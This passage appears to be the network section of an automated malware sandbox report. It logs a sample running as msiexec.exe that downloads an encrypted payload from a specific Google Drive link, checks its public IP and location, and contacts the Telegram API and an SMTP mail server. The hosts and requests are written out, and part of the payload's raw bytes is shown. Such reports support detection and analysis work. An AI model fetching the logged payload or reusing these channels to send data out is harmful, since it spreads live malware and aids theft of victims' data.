Feb 19, 2025 11:43:56.650382996 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.650770903 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.650779009 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.650903940 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.979441881 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:56.987169981 CET	50027	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:56.987226963 CET	443	50027	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:56.987349033 CET	50027	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:56.987567902 CET	50027	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:56.987580061 CET	443	50027	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:57.035691023 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:57.606924057 CET	443	50027	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:57.613249063 CET	50027	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:57.613303900 CET	443	50027	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:57.613339901 CET	50027	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:57.613354921 CET	443	50027	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:58.441009045 CET	443	50027	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:58.441216946 CET	443	50027	149.154.167.220	192.168.2.4
Feb 19, 2025 11:43:58.441293001 CET	50027	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:58.441535950 CET	50026	587	192.168.2.4	199.188.200.194
Feb 19, 2025 11:43:58.441606045 CET	50027	443	192.168.2.4	149.154.167.220
Feb 19, 2025 11:43:58.446557999 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:58.605112076 CET	587	50026	199.188.200.194	192.168.2.4
Feb 19, 2025 11:43:58.605700016 CET	50026	587	192.168.2.4	199.188.200.194

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 19, 2025 11:43:17.506846905 CET	50868	53	192.168.2.4	1.1.1.1
Feb 19, 2025 11:43:17.514540911 CET	53	50868	1.1.1.1	192.168.2.4
Feb 19, 2025 11:43:18.646895885 CET	49318	53	192.168.2.4	1.1.1.1
Feb 19, 2025 11:43:18.655725956 CET	53	49318	1.1.1.1	192.168.2.4
Feb 19, 2025 11:43:22.466016054 CET	51036	53	192.168.2.4	1.1.1.1
Feb 19, 2025 11:43:22.473870993 CET	53	51036	1.1.1.1	192.168.2.4
Feb 19, 2025 11:43:24.215209961 CET	63367	53	192.168.2.4	1.1.1.1
Feb 19, 2025 11:43:24.308054924 CET	53	63367	1.1.1.1	192.168.2.4
Feb 19, 2025 11:43:43.589107990 CET	51979	53	192.168.2.4	1.1.1.1
Feb 19, 2025 11:43:43.596379995 CET	53	51979	1.1.1.1	192.168.2.4
Feb 19, 2025 11:43:51.162442923 CET	60172	53	192.168.2.4	1.1.1.1
Feb 19, 2025 11:43:51.176492929 CET	53	60172	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 19, 2025 11:43:17.506846905 CET	192.168.2.4	1.1.1.1	0x965b	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:18.646895885 CET	192.168.2.4	1.1.1.1	0xbbbe	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:22.466016054 CET	192.168.2.4	1.1.1.1	0xcd73	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:24.215209961 CET	192.168.2.4	1.1.1.1	0x26f6	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:43.589107990 CET	192.168.2.4	1.1.1.1	0xab6f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:51.162442923 CET	192.168.2.4	1.1.1.1	0xd691	Standard query (0)	mail.ndovumotor.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 19, 2025 11:43:17.514540911 CET	1.1.1.1	192.168.2.4	0x965b	No error (0)	drive.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:18.655725956 CET	1.1.1.1	192.168.2.4	0xbbbe	No error (0)	drive.usercontent.google.com		172.217.16.193	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:22.473870993 CET	1.1.1.1	192.168.2.4	0xcd73	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 19, 2025 11:43:22.473870993 CET	1.1.1.1	192.168.2.4	0xcd73	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:22.473870993 CET	1.1.1.1	192.168.2.4	0xcd73	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:22.473870993 CET	1.1.1.1	192.168.2.4	0xcd73	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:22.473870993 CET	1.1.1.1	192.168.2.4	0xcd73	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:22.473870993 CET	1.1.1.1	192.168.2.4	0xcd73	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:24.308054924 CET	1.1.1.1	192.168.2.4	0x26f6	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:24.308054924 CET	1.1.1.1	192.168.2.4	0x26f6	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:24.308054924 CET	1.1.1.1	192.168.2.4	0x26f6	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:24.308054924 CET	1.1.1.1	192.168.2.4	0x26f6	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:24.308054924 CET	1.1.1.1	192.168.2.4	0x26f6	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:24.308054924 CET	1.1.1.1	192.168.2.4	0x26f6	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:24.308054924 CET	1.1.1.1	192.168.2.4	0x26f6	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:43.596379995 CET	1.1.1.1	192.168.2.4	0xab6f	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Feb 19, 2025 11:43:51.176492929 CET	1.1.1.1	192.168.2.4	0xd691	No error (0)	mail.ndovumotor.com		199.188.200.194	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49832	193.122.130.0	80	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 19, 2025 11:43:22.488171101 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 19, 2025 11:43:23.459964991 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3b1744250db49d00c45c94f70d34c1ad Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 19, 2025 11:43:23.464862108 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Feb 19, 2025 11:43:23.820662022 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 989c02cf613b0e8ab25e49d1e6fa2272 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 19, 2025 11:43:24.932183027 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Feb 19, 2025 11:43:25.229101896 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9fdcdaa7459fc12b965694f9acafa37d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49855	193.122.130.0	80	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 19, 2025 11:43:25.853295088 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Feb 19, 2025 11:43:26.314546108 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1dafe0694c903b9032357611fb2faaa6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49867	193.122.130.0	80	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 19, 2025 11:43:26.937212944 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 19, 2025 11:43:27.397555113 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ba016e56aac3632e103e81f5586b9960 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49874	193.122.130.0	80	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 19, 2025 11:43:28.024626017 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 19, 2025 11:43:28.933218956 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ac01017a913e0b693b3a9ae869a9ae20 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49886	193.122.130.0	80	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 19, 2025 11:43:29.573369980 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 19, 2025 11:43:32.455725908 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 78b004767a6a7f0039e364f6bb01b5c3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49912	193.122.130.0	80	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 19, 2025 11:43:33.091536999 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 19, 2025 11:43:37.488487005 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 21398b4d8ca94f5405436fbda9539250 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49946	193.122.130.0	80	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 19, 2025 11:43:38.134272099 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 19, 2025 11:43:40.510329008 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 56170521d3b93071771c8e973b7ca3c4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49967	193.122.130.0	80	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 19, 2025 11:43:41.133085966 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 19, 2025 11:43:42.935718060 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 394cd621f21154a654a1bdf4bb338c2c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49799	142.250.186.46	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:18 UTC	216	OUT	GET /uc?export=download&id=1gMrUkPglcluqU0V9ndhQKIrnUj84qLTS HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Cache-Control: no-cache
2025-02-19 10:43:18 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 19 Feb 2025 10:43:18 GMT Location: https://drive.usercontent.google.com/download?id=1gMrUkPglcluqU0V9ndhQKIrnUj84qLTS&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-oUUmXvebOiQxiv1aNU0EYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49810	172.217.16.193	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:19 UTC	258	OUT	GET /download?id=1gMrUkPglcluqU0V9ndhQKIrnUj84qLTS&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-02-19 10:43:21 UTC	5011	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHMx-iGlIdyvtjZUM_1hvDoODRotSJMfkiC-CDZd195HKiZ0e_Va9wJW5P8QLYZM3YL9k68 Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="WUswwNbSd128.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 278080 Last-Modified: Mon, 17 Feb 2025 12:51:27 GMT Date: Wed, 19 Feb 2025 10:43:21 GMT Expires: Wed, 19 Feb 2025 10:43:21 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=Bb8Wdw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-02-19 10:43:21 UTC	5011	IN	Data Raw: 98 73 3e fe ab 10 fd 5a 8c c3 a5 00 46 45 86 06 7b 0f c2 67 d7 ed c2 16 a6 16 8c e4 ba a8 57 e1 f2 16 3e 6f 03 0a 73 85 2f cc d2 c5 cc 59 73 58 ac 3b 13 b8 eb 0e cd f7 25 35 ba 5f fb ed 38 c5 25 e8 b1 e0 1c f9 08 30 74 e4 11 5f a5 73 92 af 20 3d 89 63 8f 23 de 43 01 45 29 b3 7a 8e ce 27 d2 1f ef 38 a5 fa b4 03 6e 6d 5f 05 5b 35 db 66 a4 29 6f 32 0e bb 85 ac 4f 83 d4 da a8 6b 14 9c 58 af f3 38 4d 76 62 8a a5 46 bb e1 c8 d7 7f bd bb b3 09 3b 3f 49 62 8a 0b b1 c7 65 b2 51 f3 aa 66 d9 f0 2d f1 de 48 21 7c 09 6a a7 ee 62 45 4f 93 7c 4d 81 87 36 c0 c0 5f 31 58 d5 37 0c 57 19 a8 d0 17 0f fc df a6 fd c4 0a 58 47 3d ec 7d 77 c3 4a b8 05 e4 9c 0c 93 f6 78 9d 63 35 d8 90 d1 6a 36 38 40 24 42 e8 7a 71 b2 20 bb 74 95 18 6d f7 e8 36 43 20 b6 52 9a 39 9c 81 9c 97 ea 94 Data Ascii: s>ZFE{gW>os/YsX;%5_8%0t_s =c#CE)z'8nm_[5f)o2OkX8MvbF;?IbeQf-H!\|jbEO\|M6_1X7WXG=}wJxc5j68@$Bzq tm6C R9
2025-02-19 10:43:21 UTC	4675	IN	Data Raw: 7e 6e 74 28 1b d8 41 53 78 6c 3e 3a 14 6b 18 73 7f f0 c1 f4 0f 45 b7 2d 60 80 0c cf 79 d3 6b 51 a7 b1 8f 79 d0 0d 1a 4b 0c 70 05 14 cc 5c 4f 91 ca e4 28 cd e9 e1 a0 b4 f7 75 39 24 c5 c7 d6 f6 09 43 3b 6f 3f 1f 92 4c 65 0b 0a 33 f4 0e 09 48 b4 59 97 7e 03 a7 72 56 d1 66 a8 99 a7 3f 2f 1b 4e 89 01 6d 12 f3 74 07 cc 1f 10 91 cd 52 7c 56 fb 88 47 83 b6 bb 94 a2 7a 70 c8 4b c8 44 2b a1 b1 4f 5d 31 a8 5d 2c f5 d9 fe 1b ea b2 31 c6 16 39 c3 67 20 21 10 89 15 34 2e d3 28 8d e7 f8 4a 69 28 74 bb 65 ef fd 50 82 8c ed 39 4a 35 d0 5b e5 68 6e 30 e4 70 96 08 30 7a e9 cf 51 5a 9d 97 83 90 2c 8c 0c 8e 23 de 49 41 99 f7 bd 7a 9f ca 0b da 0e eb 57 a4 fa b4 09 6e b1 56 2d 2b 35 db 6c ae f7 63 32 09 97 82 ab 20 82 d4 da 22 6b c8 9a 7c b0 49 36 4c f6 6b 47 86 fe e3 ad 0e 92 Data Ascii: ~nt(ASxl>:ksE-`ykQyKp\O(u9$C;o?Le3HY~rVf?/NmtR\|VGzpKD+O]1],19g !4.(Ji(teP9J5[hn0p0zQZ,#IAzWnV-+5lc2 "k\|I6LkG
2025-02-19 10:43:21 UTC	1323	IN	Data Raw: eb d6 86 a2 6d b7 c4 f7 e8 99 e2 df 9f 58 be 1b 4d 87 ac d9 3b 5e 0e 98 67 6f d2 76 7a 91 a3 40 1d 83 91 82 df c8 d5 46 e0 b6 7f 82 8c 5b 4d 5c fc 53 1d 53 19 90 8a 75 2d ac 8d fd 63 b1 7b ac e3 89 ed e1 f5 04 c7 19 61 3f db 64 78 c3 16 0a 35 3e 6b 3f da d4 88 7b 09 e3 bd 17 f5 13 fb 54 c3 f9 21 0f 7c 6e 17 84 10 a6 a2 08 51 b8 61 c0 33 d1 93 3d ce e2 78 ab c7 66 71 e7 01 1d 68 55 be fa 21 08 cc 23 ac 57 d9 08 9c 4f 0c de c6 bb 04 a4 de 9b c7 18 33 fa f1 34 34 36 2e a0 21 4d ff b8 c1 eb ea fa f1 86 a5 01 e6 5d 2c 05 e8 23 92 09 07 d0 2a 8f 21 0c fa 20 32 ea 23 52 44 0d c2 ca 2f bc 2c d5 88 5c c8 f1 30 3c 91 ed c4 f2 8c 01 8c 4f c2 86 0f c3 4a 71 f2 40 c5 8f f3 5b 6c cd e9 dd 29 6f c9 7c 3c dc 83 34 a6 b3 9e 0c e4 4d b6 5b 01 c6 d6 99 c7 ba b2 1a 3d 00 b7 Data Ascii: mXM;^govz@F[M\SSu-c{a?dx5>k?{T!\|nQa3=xfqhU!#WO3446.!M],#*! 2#RD/,\0<OJq@[l)o\|<4M[=
